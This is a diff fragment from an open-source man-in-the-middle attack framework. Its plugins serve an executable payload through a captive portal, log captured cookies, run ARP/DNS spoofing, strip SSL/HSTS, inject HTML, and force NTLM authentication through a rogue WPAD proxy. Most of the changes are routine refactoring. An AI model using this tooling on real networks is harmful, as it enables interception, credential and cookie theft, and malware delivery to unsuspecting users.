options.add_argument('--use-dns', dest='usedns', action='store_true', help='Whether we use dns spoofing to serve from a fancier portal URL captive.portal when used without options or portaldir. Requires DNS for "captive.portal" to resolve, e.g. via configured dns spoofing --dns.')
def on_shutdown(self):
'''This will be called when shutting down'''
pass
def serve_portal(self):
self.portalurl = 'http://{}/portal.html'.format(self.hostname)
from core.servers.HTTP import HTTP
HTTP.add_static_endpoint('portal.html','text/html', './config/captive/portal.html')
HTTP.add_static_endpoint('CaptiveClient.exe','application/octet-stream', self.config['Captive']['PayloadFilename'])
self.tree_info.append("Portal login served by built-in HTTP server.")
def serve_dir(self, dir):
import threading
import posixpath
import urllib
import os
from SimpleHTTPServer import SimpleHTTPRequestHandler
from BaseHTTPServer import HTTPServer as ServerClass
Protocol = "HTTP/1.0"
port = self.config['Captive']['Port']
ServerString = self.config['Captive']['ServerString']
self.portalurl = "http://{}:{}/".format(self.hostname, port)
ROUTES = (['', dir],)
class HandlerClass(SimpleHTTPRequestHandler):
'''HandlerClass adapted from https://gist.github.com/creativeaura/5546779'''
def translate_path(self, path):
'''translate path given routes'''
# set default root to cwd
root = os.getcwd()
# look up routes and set root directory accordingly
for pattern, rootdir in ROUTES:
if path.startswith(pattern):
# found match!
path = path[len(pattern):] # consume path up to pattern len
root = rootdir
break
# normalize path and prepend root directory
path = path.split('?',1)[0]
path = path.split('#',1)[0]
path = posixpath.normpath(urllib.unquote(path))
words = path.split('/')
words = filter(None, words)
path = root
for word in words:
drive, word = os.path.splitdrive(word)
head, word = os.path.split(word)
if word in (os.curdir, os.pardir):
continue
path = os.path.join(path, word)
return path
server_address = ('0.0.0.0', int(port))
HandlerClass.protocol_version = Protocol
HandlerClass.server_version = ServerString
httpd = ServerClass(server_address, HandlerClass)
ServerClass.path = dir
sa = httpd.socket.getsockname()
try:
t = threading.Thread(name='PortalServer', target=httpd.serve_forever)
t.setDaemon(True)
t.start()
self.tree_info.append("Portal Server instance running on port {} serving {}".format(port, dir))
except Exception as e:
shutdown("Failed to start Portal Server")

View file

@ -45,7 +45,6 @@ class FerretNG(Plugin):
with open(options.cookie_file, 'r') as cookie_file: with open(options.cookie_file, 'r') as cookie_file:
self.cookie_file = json.dumps(cookie_file.read()) self.cookie_file = json.dumps(cookie_file.read())
URLMonitor.getInstance().cookies = self.cookie_file URLMonitor.getInstance().cookies = self.cookie_file
cookie_file.close()
except Exception as e: except Exception as e:
shutdown("[-] Error loading cookie log file: {}".format(e)) shutdown("[-] Error loading cookie log file: {}".format(e))
@ -94,4 +93,3 @@ class FerretNG(Plugin):
self.log.info("Writing cookies to log file") self.log.info("Writing cookies to log file")
with open('./logs/ferret-ng/cookies-{}.log'.format(datetime.now().strftime("%Y-%m-%d_%H:%M:%S:%s")), 'w') as cookie_file: with open('./logs/ferret-ng/cookies-{}.log'.format(datetime.now().strftime("%Y-%m-%d_%H:%M:%S:%s")), 'w') as cookie_file:
cookie_file.write(str(URLMonitor.getInstance().cookies)) cookie_file.write(str(URLMonitor.getInstance().cookies))
cookie_file.close()

View file

@ -611,14 +611,14 @@ class FilePwn(Plugin):
def response(self, response, request, data): def response(self, response, request, data):
content_header = response.headers['content-type'] content_header = response.responseHeaders.getRawHeaders('Content-Type')[0]
client_ip = request.client.getClientIP() client_ip = request.client.getClientIP()
host = request.headers['host'] host = request.headers['host']
try: if not response.responseHeaders.hasHeader('content-length'):
content_length = int(response.headers['content-length'])
except KeyError:
content_length = None content_length = None
else:
content_length = int(response.responseHeaders.getRawHeaders('content-length')[0])
for target in self.user_config['targets'].keys(): for target in self.user_config['targets'].keys():
if target == 'ALL': if target == 'ALL':

View file

@ -0,0 +1,57 @@
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import random
import os
from plugins.plugin import Plugin
class ImageRandomizer(Plugin):
name = "ImageRandomizer"
optname = "imgrand"
desc = 'Replaces images with a random one from a specified directory'
version = "0.1"
def initialize(self, options):
self.options = options
self.img_dir = options.img_dir
def responseheaders(self, response, request):
'''Kill the image skipping that's in place for speed reasons'''
if request.isImageRequest:
request.isImageRequest = False
request.isImage = True
self.imageType = response.responseHeaders.getRawHeaders('content-type')[0].split('/')[1].upper()
def response(self, response, request, data):
try:
isImage = getattr(request, 'isImage')
except AttributeError:
isImage = False
if isImage:
try:
img = random.choice(os.listdir(self.options.img_dir))
with open(os.path.join(self.options.img_dir, img), 'rb') as img_file:
data = img_file.read()
self.clientlog.info("Replaced image with {}".format(img), extra=request.clientInfo)
return {'response': response, 'request': request, 'data': data}
except Exception as e:
self.clientlog.info("Error: {}".format(e), extra=request.clientInfo)
def options(self, options):
options.add_argument("--img-dir", type=str, metavar="DIRECTORY", help="Directory with images")

View file

@ -61,10 +61,13 @@ class Inject(Plugin):
ip = response.getClientIP() ip = response.getClientIP()
hn = response.getRequestHostname() hn = response.getRequestHostname()
try: if not response.responseHeaders.hasHeader('Content-Type'):
mime = response.headers['Content-Type'] return {'response': response, 'request':request, 'data': data}
except KeyError:
return mime = response.responseHeaders.getRawHeaders('Content-Type')[0]
if "text/html" not in mime:
return {'response': response, 'request':request, 'data': data}
if "charset" in mime: if "charset" in mime:
match = re.search('charset=(.*)', mime) match = re.search('charset=(.*)', mime)

View file

@ -31,6 +31,7 @@ class Plugin(ConfigWatcher):
def __init__(self, parser): def __init__(self, parser):
'''Passed the options namespace''' '''Passed the options namespace'''
if self.desc: if self.desc:
sgroup = parser.add_argument_group(self.name, self.desc) sgroup = parser.add_argument_group(self.name, self.desc)
else: else:

View file

@ -35,7 +35,7 @@ class Replace(Plugin):
self.options = options self.options = options
def response(self, response, request, data): def response(self, response, request, data):
mime = response.headers['Content-Type'] mime = response.responseHeaders.getRawHeaders('Content-Type')[0]
hn = response.getRequestHostname() hn = response.getRequestHostname()
if "text/html" in mime: if "text/html" in mime:

View file

@ -91,5 +91,5 @@ class Responder(Plugin):
options.add_argument('--fingerprint', dest="finger", action="store_true", help="Fingerprint hosts that issued an NBT-NS or LLMNR query") options.add_argument('--fingerprint', dest="finger", action="store_true", help="Fingerprint hosts that issued an NBT-NS or LLMNR query")
options.add_argument('--lm', dest="lm", action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier") options.add_argument('--lm', dest="lm", action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier")
options.add_argument('--wpad', dest="wpad", action="store_true", help="Start the WPAD rogue proxy server") options.add_argument('--wpad', dest="wpad", action="store_true", help="Start the WPAD rogue proxy server")
options.add_argument('--forcewpadauth', dest="forcewpadauth", action="store_true", help="Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False") options.add_argument('--forcewpadauth', dest="forcewpadauth", action="store_true", help="Force NTLM/Basic authentication on wpad.dat file retrieval (might cause a login prompt)")
options.add_argument('--basic', dest="basic", action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned") options.add_argument('--basic', dest="basic", action="store_true", help="Return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")

View file

@ -46,7 +46,6 @@ class ScreenShotter(Inject, Plugin):
try: try:
with open('./logs/' + img_file, 'wb') as img: with open('./logs/' + img_file, 'wb') as img:
img.write(base64.b64decode(urllib.unquote(request.postData).decode('utf8').split(',')[1])) img.write(base64.b64decode(urllib.unquote(request.postData).decode('utf8').split(',')[1]))
img.close()
self.clientlog.info('Saved screenshot to {}'.format(img_file), extra=request.clientInfo) self.clientlog.info('Saved screenshot to {}'.format(img_file), extra=request.clientInfo)
except Exception as e: except Exception as e:

View file

@ -33,6 +33,6 @@ class SMBTrap(Plugin):
return {"request": request, "version": version, "code": 302, "message": "Found"} return {"request": request, "version": version, "code": 302, "message": "Found"}
def responseheaders(self, response, request): def responseheaders(self, response, request):
self.clientlog.info("Trapping request to {}".format(request.headers['host'])) self.clientlog.info("Trapping request to {}".format(request.headers['host']), extra=request.clientInfo)
rand_path = ''.join(random.sample(string.ascii_uppercase + string.digits, 8)) rand_path = ''.join(random.sample(string.ascii_uppercase + string.digits, 8))
response.headers["Location"] = "file://{}/{}".format(self.ip, rand_path) response.responseHeaders.setRawHeaders('Location', ["file://{}/{}".format(self.ip, rand_path)])

View file

@ -70,7 +70,7 @@ class Spoof(Plugin):
if options.dns: if options.dns:
self.tree_info.append('DNS spoofing enabled') self.tree_info.append('DNS spoofing enabled')
if iptables().dns is False: if iptables().dns is False and options.filter is None:
iptables().DNS(self.config['MITMf']['DNS']['port']) iptables().DNS(self.config['MITMf']['DNS']['port'])
if not options.arp and not options.icmp and not options.dhcp and not options.dns: if not options.arp and not options.icmp and not options.dhcp and not options.dns:
@ -78,7 +78,7 @@ class Spoof(Plugin):
set_ip_forwarding(1) set_ip_forwarding(1)
if iptables().http is False: if iptables().http is False and options.filter is None:
iptables().HTTP(options.listen_port) iptables().HTTP(options.listen_port)
for protocol in self.protocol_instances: for protocol in self.protocol_instances:
@ -96,7 +96,7 @@ class Spoof(Plugin):
options.add_argument('--gatewaymac', dest='gatewaymac', help='Specify the gateway MAC [will auto resolve if ommited]') options.add_argument('--gatewaymac', dest='gatewaymac', help='Specify the gateway MAC [will auto resolve if ommited]')
options.add_argument('--targets', dest='targets', help='Specify host/s to poison [if ommited will default to subnet]') options.add_argument('--targets', dest='targets', help='Specify host/s to poison [if ommited will default to subnet]')
options.add_argument('--ignore', dest='ignore', help='Specify host/s not to poison') options.add_argument('--ignore', dest='ignore', help='Specify host/s not to poison')
options.add_argument('--arpmode',type=str, dest='arpmode', default='rep', choices=["rep", "req"], help=' ARP Spoofing mode: replies (rep) or requests (req) [default: rep]') options.add_argument('--arpmode', type=str, dest='arpmode', default='rep', choices=["rep", "req"], help='ARP Spoofing mode: replies (rep) or requests (req) [default: rep]')
def on_shutdown(self): def on_shutdown(self):
from core.utils import iptables, set_ip_forwarding from core.utils import iptables, set_ip_forwarding

View file

@ -33,7 +33,7 @@ class SSLstripPlus(Plugin):
from core.servers.DNS import DNSChef from core.servers.DNS import DNSChef
from core.utils import iptables from core.utils import iptables
if iptables().dns is False: if iptables().dns is False and options.filter is False:
iptables().DNS(self.config['MITMf']['DNS']['port']) iptables().DNS(self.config['MITMf']['DNS']['port'])
URLMonitor.getInstance().setHstsBypass() URLMonitor.getInstance().setHstsBypass()

View file

@ -34,7 +34,7 @@ class Upsidedownternet(Plugin):
if request.isImageRequest: if request.isImageRequest:
request.isImageRequest = False request.isImageRequest = False
request.isImage = True request.isImage = True
self.imageType = response.headers['content-type'].split('/')[1].upper() self.imageType = response.responseHeaders.getRawHeaders('content-type')[0].split('/')[1].upper()
def response(self, response, request, data): def response(self, response, request, data):
try: try:

View file

@ -1,4 +1,4 @@
git+git://github.com/kti/python-netfilterqueue git+https://github.com/kti/python-netfilterqueue
pyinotify pyinotify
pycrypto pycrypto
pyasn1 pyasn1

View file

@ -1,3 +0,0 @@
#!/usr/bin/env bash
git submodule init && git submodule update --recursive

View file

@ -24,7 +24,7 @@ class BasicTests(unittest.TestCase):
from core.logger import logger from core.logger import logger
logger.log_level = logging.DEBUG logger.log_level = logging.DEBUG
from core.netcreds import NetCreds from core.netcreds import NetCreds
NetCreds().start('venet0:0', '172.30.96.18', None) NetCreds().start('venet0:0', '172.30.96.18')
def test_SSLStrip_Proxy(self): def test_SSLStrip_Proxy(self):
favicon = True favicon = True